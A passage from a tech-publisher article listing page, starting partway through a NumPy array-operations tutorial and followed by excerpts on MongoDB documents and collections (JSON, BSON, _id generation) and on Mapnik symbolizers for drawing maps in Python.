array([[1, 1],                  [1, 1]])   In [230]: ar2=np.array([[2,2],[2,2]]); ar2 Out[230]: array([[2, 2],                  [2, 2]])   In [232]: ar.dot(ar2) Out[232]: array([[4, 4],                  [4, 4]]) Comparisons and logical operations are also element-wise: In [235]: ar=np.arange(1,5); ar Out[235]: array([1, 2, 3, 4])   In [238]: ar2=np.arange(5,1,-1);ar2 Out[238]: array([5, 4, 3, 2])   In [241]: ar < ar2 Out[241]: array([ True, True, False, False], dtype=bool)   In [242]: l1 = np.array([True,False,True,False])          l2 = np.array([False,False,True, False])          np.logical_and(l1,l2) Out[242]: array([False, False, True, False], dtype=bool) Other NumPy operations such as log, sin, cos, and exp are also element-wise: In [244]: ar=np.array([np.pi, np.pi/2]); np.sin(ar) Out[244]: array([ 1.22464680e-16,   1.00000000e+00]) Note that for element-wise operations on two NumPy arrays, the two arrays must have the same shape, else an error will result since the arguments of the operation must be the corresponding elements in the two arrays: In [245]: ar=np.arange(0,6); ar Out[245]: array([0, 1, 2, 3, 4, 5])   In [246]: ar2=np.arange(0,8); ar2 Out[246]: array([0, 1, 2, 3, 4, 5, 6, 7])   In [247]: ar*ar2          ---------------------------------------------------------------------------          ValueError                              Traceback (most recent call last)          <ipython-input-247-2c3240f67b63> in <module>()          ----> 1 ar*ar2          ValueError: operands could not be broadcast together with shapes (6) (8) Further, NumPy arrays can be transposed as follows: In [249]: ar=np.array([[1,2,3],[4,5,6]]); ar Out[249]: array([[1, 2, 3],                  [4, 5, 6]])   In [250]:ar.T Out[250]:array([[1, 4],                [2, 5],                [3, 6]])   In [251]: np.transpose(ar) Out[251]: array([[1, 4],                 [2, 5],                  [3, 6]]) Suppose we wish to compare arrays not element-wise, but array-wise. We could achieve this as follows by using the np.array_equal operator: In [254]: ar=np.arange(0,6)          ar2=np.array([0,1,2,3,4,5])          np.array_equal(ar, ar2) Out[254]: True Here, we see that a single Boolean value is returned instead of a Boolean array. The value is True only if all the corresponding elements in the two arrays match. The preceding expression is equivalent to the following: In [24]: np.all(ar==ar2) Out[24]: True Reduction operations Operators such as np.sum and np.prod perform reduces on arrays; that is, they combine several elements into a single value: In [257]: ar=np.arange(1,5)          ar.prod() Out[257]: 24 In the case of multi-dimensional arrays, we can specify whether we want the reduction operator to be applied row-wise or column-wise by using the axis parameter: In [259]: ar=np.array([np.arange(1,6),np.arange(1,6)]);ar Out[259]: array([[1, 2, 3, 4, 5],                 [1, 2, 3, 4, 5]]) # Columns In [261]: np.prod(ar,axis=0) Out[261]: array([ 1, 4, 9, 16, 25]) # Rows In [262]: np.prod(ar,axis=1) Out[262]: array([120, 120]) In the case of multi-dimensional arrays, not specifying an axis results in the operation being applied to all elements of the array as explained in the following example: In [268]: ar=np.array([[2,3,4],[5,6,7],[8,9,10]]); ar.sum() Out[268]: 54   In [269]: ar.mean() Out[269]: 6.0 In [271]: np.median(ar) Out[271]: 6.0 Statistical operators These operators are used to apply standard statistical operations to a NumPy array. The names are self-explanatory: np.std(), np.mean(), np.median(), and np.cumsum(). In [309]: np.random.seed(10)          ar=np.random.randint(0,10, size=(4,5));ar Out[309]: array([[9, 4, 0, 1, 9],                  [0, 1, 8, 9, 0],                  [8, 6, 4, 3, 0],                  [4, 6, 8, 1, 8]]) In [310]: ar.mean() Out[310]: 4.4500000000000002   In [311]: ar.std() Out[311]: 3.4274626183227732   In [312]: ar.var(axis=0) # across rows Out[312]: array([ 12.6875,   4.1875, 11.   , 10.75 , 18.1875])   In [313]: ar.cumsum() Out[313]: array([ 9, 13, 13, 14, 23, 23, 24, 32, 41, 41, 49, 55,                  59, 62, 62, 66, 72, 80, 81, 89]) Logical operators Logical operators can be used for array comparison/checking. They are as follows: np.all(): This is used for element-wise and all of the elements np.any(): This is used for element-wise or all of the elements Generate a random 4 × 4 array of ints and check if any element is divisible by 7 and if all elements are less than 11: In [320]: np.random.seed(100)          ar=np.random.randint(1,10, size=(4,4));ar Out[320]: array([[9, 9, 4, 8],                  [8, 1, 5, 3],                  [6, 3, 3, 3],                  [2, 1, 9, 5]])   In [318]: np.any((ar%7)==0) Out[318]: False   In [319]: np.all(ar<11) Out[319]: True Broadcasting In broadcasting, we make use of NumPy's ability to combine arrays that don't have the same exact shape. Here is an example: In [357]: ar=np.ones([3,2]); ar Out[357]: array([[ 1., 1.],                  [ 1., 1.],                  [ 1., 1.]])   In [358]: ar2=np.array([2,3]); ar2 Out[358]: array([2, 3])   In [359]: ar+ar2 Out[359]: array([[ 3., 4.],                  [ 3., 4.],                  [ 3., 4.]]) Thus, we can see that ar2 is broadcasted across the rows of ar by adding it to each row of ar producing the preceding result. Here is another example, showing that broadcasting works across dimensions: In [369]: ar=np.array([[23,24,25]]); ar Out[369]: array([[23, 24, 25]]) In [368]: ar.T Out[368]: array([[23],                  [24],                  [25]]) In [370]: ar.T+ar Out[370]: array([[46, 47, 48],                  [47, 48, 49],                  [48, 49, 50]]) Here, both row and column arrays were broadcasted and we ended up with a 3 × 3 array. Array shape manipulation There are a number of steps for the shape manipulation of arrays. Flattening a multi-dimensional array The np.ravel() function allows you to flatten a multi-dimensional array as follows: In [385]: ar=np.array([np.arange(1,6), np.arange(10,15)]); ar Out[385]: array([[ 1, 2, 3, 4, 5],                  [10, 11, 12, 13, 14]])   In [386]: ar.ravel() Out[386]: array([ 1, 2, 3, 4, 5, 10, 11, 12, 13, 14])   In [387]: ar.T.ravel() Out[387]: array([ 1, 10, 2, 11, 3, 12, 4, 13, 5, 14]) You can also use np.flatten, which does the same thing, except that it returns a copy while np.ravel returns a view. Reshaping The reshape function can be used to change the shape of or unflatten an array: In [389]: ar=np.arange(1,16);ar Out[389]: array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]) In [390]: ar.reshape(3,5) Out[390]: array([[ 1, 2, 3, 4, 5],                  [ 6, 7, 8, 9, 10],                 [11, 12, 13, 14, 15]]) The np.reshape function returns a view of the data, meaning that the underlying array remains unchanged. In special cases, however, the shape cannot be changed without the data being copied. For more details on this, see the documentation at http://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html. Resizing There are two resize operators, numpy.ndarray.resize, which is an ndarray operator that resizes in place, and numpy.resize, which returns a new array with the specified shape. Here, we illustrate the numpy.ndarray.resize function: In [408]: ar=np.arange(5); ar.resize((8,));ar Out[408]: array([0, 1, 2, 3, 4, 0, 0, 0]) Note that this function only works if there are no other references to this array; else, ValueError results: In [34]: ar=np.arange(5);          ar Out[34]: array([0, 1, 2, 3, 4]) In [35]: ar2=ar In [36]: ar.resize((8,)); --------------------------------------------------------------------------- ValueError                                Traceback (most recent call last) <ipython-input-36-394f7795e2d1> in <module>() ----> 1 ar.resize((8,));   ValueError: cannot resize an array that references or is referenced by another array in this way. Use the resize function The way around this is to use the numpy.resize function instead: In [38]: np.resize(ar,(8,)) Out[38]: array([0, 1, 2, 3, 4, 0, 1, 2]) Adding a dimension The np.newaxis function adds an additional dimension to an array: In [377]: ar=np.array([14,15,16]); ar.shape Out[377]: (3,) In [378]: ar Out[378]: array([14, 15, 16]) In [379]: ar=ar[:, np.newaxis]; ar.shape Out[379]: (3, 1) In [380]: ar Out[380]: array([[14],                  [15],                  [16]]) Array sorting Arrays can be sorted in various ways. Sort the array along an axis; first, let's discuss this along the y-axis: In [43]: ar=np.array([[3,2],[10,-1]])          ar Out[43]: array([[ 3, 2],                [10, -1]]) In [44]: ar.sort(axis=1)          ar Out[44]: array([[ 2, 3],                [-1, 10]]) Here, we will explain the sorting along the x-axis: In [45]: ar=np.array([[3,2],[10,-1]])          ar Out[45]: array([[ 3, 2],                [10, -1]]) In [46]: ar.sort(axis=0)          ar Out[46]: array([[ 3, -1],                [10, 2]]) Sorting by in-place (np.array.sort) and out-of-place (np.sort) functions. Other operations that are available for array sorting include the following: np.min(): It returns the minimum element in the array np.max(): It returns the maximum element in the array np.std(): It returns the standard deviation of the elements in the array np.var(): It returns the variance of elements in the array np.argmin(): It indices of minimum np.argmax(): It indices of maximum np.all(): It returns element-wise and all of the elements np.any(): It returns element-wise or all of the elements Summary In this article we discussed how numpy.ndarray is the bedrock data structure on which the pandas data structures are based. The pandas data structures at their heart consist of NumPy ndarray of data and an array or arrays of labels. There are three main data structures in pandas: Series, DataFrame, and Panel. The pandas data structures are much easier to use and more user-friendly than Numpy ndarrays, since they provide row indexes and column indexes in the case of DataFrame and Panel. The DataFrame object is the most popular and widely used object in pandas. Resources for Article: Further resources on this subject: Machine Learning [article] Financial Derivative – Options [article] Introducing Interactive Plotting [article]
Read more
  • 0
  • 0
  • 4873
article-image-documents-and-collections-data-modeling-mongodb
Packt
22 Jun 2015
12 min read
Save for later

Documents and Collections in Data Modeling with MongoDB

Packt
22 Jun 2015
12 min read
In this article by Wilson da Rocha França, author of the book, MongoDB Data Modeling, we will cover documents and collections used in data modeling with MongoDB. (For more resources related to this topic, see here.) Data modeling is a very important process during the conception of an application since this step will help you to define the necessary requirements for the database's construction. This definition is precisely the result of the data understanding acquired during the data modeling process. As previously described, this process, regardless of the chosen data model, is commonly divided into two phases: one that is very close to the user's view and the other that is a translation of this view to a conceptual schema. In the scenario of relational database modeling, the main challenge is to build a robust database from these two phases, with the aim of guaranteeing updates to it with any impact during the application's lifecycle. A big advantage of NoSQL compared to relational databases is that NoSQL databases are more flexible at this point, due to the possibility of a schema-less model that, in theory, can cause less impact on the user's view if a modification in the data model is needed. Despite the flexibility NoSQL offers, it is important to previously know how we will use the data in order to model a NoSQL database. It is a good idea not to plan the data format to be persisted, even in a NoSQL database. Moreover, at first sight, this is the point where database administrators, quite used to the relational world, become more uncomfortable. Relational database standards, such as SQL, brought us a sense of security and stability by setting up rules, norms, and criteria. On the other hand, we will dare to state that this security turned database designers distant of the domain from which the data to be stored is drawn. The same thing happened with application developers. There is a notable divergence of interests among them and database administrators, especially regarding data models. The NoSQL databases practically bring the need for an approximation between database professionals and the applications, and also the need for an approximation between developers and databases. For that reason, even though you may be a data modeler/designer or a database administrator, don't be scared if from now on we address subjects that are out of your comfort zone. Be prepared to start using words common from the application developer's point of view, and add them to your vocabulary. This article will cover the following: Introducing your documents and collections The document's characteristics and structure Introducing documents and collections MongoDB has the document as a basic unity of data. The documents in MongoDB are represented in JavaScript Object Notation (JSON). Collections are groups of documents. Making an analogy, a collection is similar to a table in a relational model and a document is a record in this table. And finally, collections belong to a database in MongoDB. The documents are serialized on disk in a format known as Binary JSON (BSON), a binary representation of a JSON document. An example of a document is: {    "_id": 123456,    "firstName": "John",    "lastName": "Clay",    "age": 25,    "address": {      "streetAddress": "131 GEN. Almério de Moura Street",      "city": "Rio de Janeiro",      "state": "RJ",      "postalCode": "20921060"    },    "phoneNumber":[      {          "type": "home",          "number": "+5521 2222-3333"      },      {          "type": "mobile",          "number": "+5521 9888-7777"      }    ] } Unlike the relational model, where you must declare a table structure, a collection doesn't enforce a certain structure for a document. It is possible that a collection contains documents with completely different structures. We can have, for instance, on the same users collection: {    "_id": "123456",    "username": "johnclay",    "age": 25,    "friends":[      {"username": "joelsant"},      {"username": "adilsonbat"}    ],    "active": true,    "gender": "male" } We can also have: {    "_id": "654321",    "username": "santymonty",    "age": 25,    "active": true,    "gender": "male",    "eyeColor": "brown" } In addition to this, another interesting feature of MongoDB is that not just data is represented by documents. Basically, all user interactions with MongoDB are made through documents. Besides data recording, documents are a means to: Define what data can be read, written, and/or updated in queries Define which fields will be updated Create indexes Configure replication Query the information from the database Before we go deep into the technical details of documents, let's explore their structure. JSON JSON is a text format for the open-standard representation of data and that is ideal for data traffic. To explore the JSON format deeper, you can check ECMA-404 The JSON Data Interchange Standard where the JSON format is fully described. JSON is described by two standards: ECMA-404 and RFC 7159. The first one puts more focus on the JSON grammar and syntax, while the second provides semantic and security considerations. As the name suggests, JSON arises from the JavaScript language. It came about as a solution for object state transfers between the web server and the browser. Despite being part of JavaScript, it is possible to find generators and readers for JSON in almost all the most popular programming languages such as C, Java, and Python. The JSON format is also considered highly friendly and human-readable. JSON does not depend on the platform chosen, and its specification are based on two data structures: A set or group of key/value pairs A value ordered list So, in order to clarify any doubts, let's talk about objects. Objects are a non-ordered collection of key/value pairs that are represented by the following pattern: {    "key" : "value" } In relation to the value ordered list, a collection is represented as follows: ["value1", "value2", "value3"] In the JSON specification, a value can be: A string delimited with " " A number, with or without a sign, on a decimal base (base 10). This number can have a fractional part, delimited by a period (.), or an exponential part followed by e or E Boolean values (true or false) A null value Another object Another value ordered array The following diagram shows us the JSON value structure: Here is an example of JSON code that describes a person: {    "name" : "Han",    "lastname" : "Solo",    "position" : "Captain of the Millenium Falcon",    "species" : "human",    "gender":"male",    "height" : 1.8 } BSON BSON means Binary JSON, which, in other words, means binary-encoded serialization for JSON documents. If you are seeking more knowledge on BSON, I suggest you take a look at the BSON specification on http://bsonspec.org/. If we compare BSON to the other binary formats, BSON has the advantage of being a model that allows you more flexibility. Also, one of its characteristics is that it's lightweight—a feature that is very important for data transport on the Web. The BSON format was designed to be easily navigable and both encoded and decoded in a very efficient way for most of the programming languages that are based on C. This is the reason why BSON was chosen as the data format for MongoDB disk persistence. The types of data representation in BSON are: String UTF-8 (string) Integer 32-bit (int32) Integer 64-bit (int64) Floating point (double) Document (document) Array (document) Binary data (binary) Boolean false (x00 or byte 0000 0000) Boolean true (x01 or byte 0000 0001) UTC datetime (int64)—the int64 is UTC milliseconds since the Unix epoch Timestamp (int64)—this is the special internal type used by MongoDB replication and sharding; the first 4 bytes are an increment, and the last 4 are a timestamp Null value () Regular expression (cstring) JavaScript code (string) JavaScript code w/scope (code_w_s) Min key()—the special type that compares a lower value than all other possible BSON element values Max key()—the special type that compares a higher value than all other possible BSON element values ObjectId (byte*12) Characteristics of documents Before we go into detail about how we must model documents, we need a better understanding of some of its characteristics. These characteristics can determine your decision about how the document must be modeled. The document size We must keep in mind that the maximum length for a BSON document is 16 MB. According to BSON specifications, this length is ideal for data transfers through the Web and to avoid the excessive use of RAM. But this is only a recommendation. Nowadays, a document can exceed the 16 MB length by using GridFS. GridFS allows us to store documents in MongoDB that are larger than the BSON maximum size, by dividing it into parts, or chunks. Each chunk is a new document with 255 K of size. Names and values for a field in a document There are a few things that you must know about names and values for fields in a document. First of all, any field's name in a document is a string. As usual, we have some restrictions on field names. They are: The _id field is reserved for a primary key You cannot start the name using the character $ The name cannot have a null character, or (.) Additionally, documents that have indexed fields must respect the size limit for an indexed field. The values cannot exceed the maximum size of 1,024 bytes. The document primary key As seen in the preceding section, the _id field is reserved for the primary key. By default, this field must be the first one in the document, even when, during an insertion, it is not the first field to be inserted. In these cases, MongoDB moves it to the first position. Also, by definition, it is in this field that a unique index will be created. The _id field can have any value that is a BSON type, except the array. Moreover, if a document is created without an indication of the _id field, MongoDB will automatically create an _id field of the ObjectId type. However, this is not the only option. You can use any value you want to identify your document as long as it is unique. There is another option, that is, generating an auto-incremental value based on a support collection or on an optimistic loop. Support collections In this method, we use a separate collection that will keep the last used value in the sequence. To increment the sequence, first we should query the last used value. After this, we can use the operator $inc to increment the value. There is a collection called system.js that can keep the JavaScript code in order to reuse it. Be careful not to include application logic in this collection. Let's see an example for this method: db.counters.insert(    {      _id: "userid",      seq: 0    } )   function getNextSequence(name) {    var ret = db.counters.findAndModify(          {            query: { _id: name },            update: { $inc: { seq: 1 } },            new: true          }    );    return ret.seq; }   db.users.insert(    {      _id: getNextSequence("userid"),      name: "Sarah C."    } ) The optimistic loop The generation of the _id field by an optimistic loop is done by incrementing each iteration and, after that, attempting to insert it in a new document: function insertDocument(doc, targetCollection) {    while (1) {        var cursor = targetCollection.find( {},         { _id: 1 } ).sort( { _id: -1 } ).limit(1);        var seq = cursor.hasNext() ? cursor.next()._id + 1 : 1;        doc._id = seq;        var results = targetCollection.insert(doc);        if( results.hasWriteError() ) {            if( results.writeError.code == 11000 /* dup key */ )                continue;            else                print( "unexpected error inserting data: " +                 tojson( results ) );        }        break;    } } In this function, the iteration does the following: Searches in targetCollection for the maximum value for _id. Settles the next value for _id. Sets the value on the document to be inserted. Inserts the document. In the case of errors due to duplicated _id fields, the loop repeats itself, or else the iteration ends. The points demonstrated here are the basics to understanding all the possibilities and approaches that this tool can offer. But, although we can use auto-incrementing fields for MongoDB, we must avoid using them because this tool does not scale for a huge data mass. Summary In this article, you saw how to build documents in MongoDB, examined their characteristics, and saw how they are organized into collections. Resources for Article: Further resources on this subject: Apache Solr and Big Data – integration with MongoDB [article] About MongoDB [article] Creating a RESTful API [article]
Read more
  • 0
  • 0
  • 2397

article-image-symbolizers
Packt
18 Jun 2015
8 min read
Save for later

Symbolizers

Packt
18 Jun 2015
8 min read
In this article by Erik Westra, author of the book, Python Geospatial Analysis Essentials, we will see that symbolizers do the actual work of drawing a feature onto the map. Multiple symbolizers are often used to draw a single feature. There are many different types of symbolizers available within Mapnik, and many of the symbolizers have complex options associated with them. Rather than exhaustively listing all the symbolizers and their various options, we will instead just look at some of the more common types of symbolizers and how they can be used. (For more resources related to this topic, see here.) PointSymbolizer The PointSymbolizer class is used to draw an image centered over a Point geometry. By default, each point is displayed as a 4 x 4 pixel black square: To use a different image, you have to create a mapnik.PathExpression object to represent the path to the desired image file, and then pass that to the PointSymbolizer object when you instantiate it: path = mapnik.PathExpression("/path/to/image.png") point_symbol = PointSymbolizer(path) Note that PointSymbolizer draws the image centered on the desired point. To use a drop-pin image as shown in the preceding example, you will need to add extra transparent whitespace so that the tip of the pin is in the middle of the image, like this: You can control the opacity of the drawn image by setting the symbolizer's opacity attribute. You can also control whether labels will be drawn on top of the image by setting the allow_overlap attribute to True. Finally, you can apply an SVG transformation to the image by setting the transform attribute to a string containing a standard SVG transformation expression, for example point_symbol.transform = "rotate(45)". Documentation for the PointSymbolizer can be found at https://github.com/mapnik/mapnik/wiki/PointSymbolizer. LineSymbolizer A mapnik.LineSymbolizer is used to draw LineString geometries and the outlines of Polygon geometries. When you create a new LineSymbolizer, you would typically configure it using two parameters: the color to use to draw the line as a mapnik.Color object, and the width of the line, measured in pixels. For example: line_symbol = mapnik.LineSymbolizer(mapnik.Color("black"), 0.5) Notice that you can use fractional line widths; because Mapnik uses anti-aliasing, a line narrower than 1 pixel will often look better than a line with an integer width if you are drawing many lines close together. In addition to the color and the width, you can also make the line semi-transparent by setting the opacity attribute. This should be set to a number between 0.0 and 1.0, where 0.0 means the line will be completely transparent and 1.0 means the line will be completely opaque. You can also use the stroke attribute to get access to (or replace) the stroke object used by the line symbolizer. The stroke object, an instance of mapnik.Stroke, can be used for more complicated visual effects. For example, you can create a dashed line effect by calling the stroke's add_dash() method: line_symbol.stroke.add_dash(5, 7) Both numbers are measured in pixels; the first number is the length of the dash segment, while the second is the length of the gap between dashes. Note that you can create alternating dash patterns by calling add_dash() more than once. You can also set the stroke's line_cap attribute to control how the ends of the line should be drawn, and the stroke's line_join attribute to control how the joins between the individual line segments are drawn whenever the LineString changes direction. The line_cap attribute can be set to one of the following values: mapnik.line_cap.BUTT_CAP mapnik.line_cap.ROUND_CAP mapnik.line_cap.SQUARE_CAP The line_join attribute can be set to one of the following: mapnik.line_join.MITER_JOIN mapnik.line_join.ROUND_JOIN mapnik.line_join.BEVEL_JOIN Documentation for the LineSymbolizer class can be found at https://github.com/mapnik/mapnik/wiki/LineSymbolizer. PolygonSymbolizer The mapnik.PolygonSymbolizer class is used to fill the interior of a Polygon geometry with a given color. When you create a new PolygonSymbolizer, you would typically pass it a single parameter: the mapnik.Color object to use to fill the polygon. You can also change the opacity of the symbolizer by setting the fill_opacity attribute, for example: fill_symbol.fill_opacity = 0.8 Once again, the opacity is measured from 0.0 (completely transparent) to 1.0 (completely opaque). There is one other PolygonSymbolizer attribute which you might find useful: gamma. The gamma value can be set to a number between 0.0 and 1.0. The gamma value controls the amount of anti-aliasing used to draw the edge of the polygon; with the default gamma value of 1.0, the edges of the polygon will be fully anti-aliased. While this is usually a good thing, if you try to draw adjacent polygons with the same color, the antialiasing will cause the edges of the polygons to be visible rather than combining them into a single larger area. By turning down the gamma slightly (for example, fill_symbol.gamma = 0.6), the edges between adjacent polygons will disappear. Documentation for the PolygonSymbolizer class can be found at https://github.com/mapnik/mapnik/wiki/PolygonSymbolizer. TextSymbolizer The TextSymbolizer class is used to draw textual labels onto a map. This type of symbolizer can be used for point, LineString, and Polygon geometries. The following example shows how a TextSymbolizer can be used: text_symbol = mapnik.TextSymbolizer(mapnik.Expresion("[label]"), "DejaVu Sans Book", 10, mapnik.Color("black")) As you can see, four parameters are typically passed to the TextSymbolizer's initializer: A mapnik.Expression object defining the text to be displayed. In this case, the text to be displayed will come from the label attribute in the datasource. The name of the font to use for drawing the text. To see what fonts are available, type the following into the Python command line: import mapnik for font in mapnik.FontEngine.face_names():    print font The font size, measured in pixels. The color to use to draw the text. By default, the text will be drawn in the center of the geometry; for example: This positioning of the label is called point placement. The TextSymbolizer allows you to change this to use what is called line placement, where the label will be drawn along the lines: text_symbol.label_placement = mapnik.label_placement.LINE_PLACEMENT As you can see, this causes the label to be drawn along the length of a LineString geometry, or along the perimeter of a Polygon. The text won't be drawn at all for a Point geometry, since there are no lines within a point. The TextSymbolizer will normally just draw the label once, but you can tell the symbolizer to repeat the label if you wish by specifying a pixel gap to use between each label: text_symbol.label_spacing = 30 By default, Mapnik is smart enough to stop labels from overlapping each other. If possible, it moves the label slightly to avoid an overlap, and then hides the label completely if it would still overlap. For example: You can change this by setting the allow_overlap attribute: text_symbol.allow_overlap = True Finally, you can set a halo effect to draw a lighter-colored border around the text so that it is visible even against a dark background. For example, text_symbol.halo_fill = mapnik.Color("white") text_symbol.halo_radius = 1 There are many more labeling options, all of which are described at length in the documentation for the TextSymbolizer class. This can be found at https://github.com/mapnik/mapnik/wiki/TextSymbolizer. RasterSymbolizer The RasterSymbolizer class is used to draw raster-format data onto a map. This type of symbolizer is typically used in conjunction with a Raster or GDAL datasource. To create a new raster symbolizer, you instantiate a new mapnik.RasterSymbolizer object: raster_symbol = mapnik.RasterSymbolizer() The raster symbolizer will automatically draw any raster-format data provided by the map layer's datasource. This is often used to draw a basemap onto which the vector data is to be displayed; for example: While there are some advanced options to control the way the raster data is displayed, in most cases, the only option you might be interested in is the opacity attribute. As usual, this sets the opacity for the displayed image, allowing you to layer semi-transparent raster images one on top of the other. Documentation for the RasterSymbolizer can be found at https://github.com/mapnik/mapnik/wiki/RasterSymbolizer. Summary In this article, we covered different types of symbolizers, which are available in the Mapnik library. We also examined that symbolizers which can be used to display spatial features, how the visible extent is used to control the portion of the map to be displayed, and how to render a map as an image file. Resources for Article: Further resources on this subject: Python functions – Avoid repeating code [article] Preparing to Build Your Own GIS Application [article] Server Logs [article]
Read more
  • 0
  • 0
  • 3517
Modal Close icon
Modal Close icon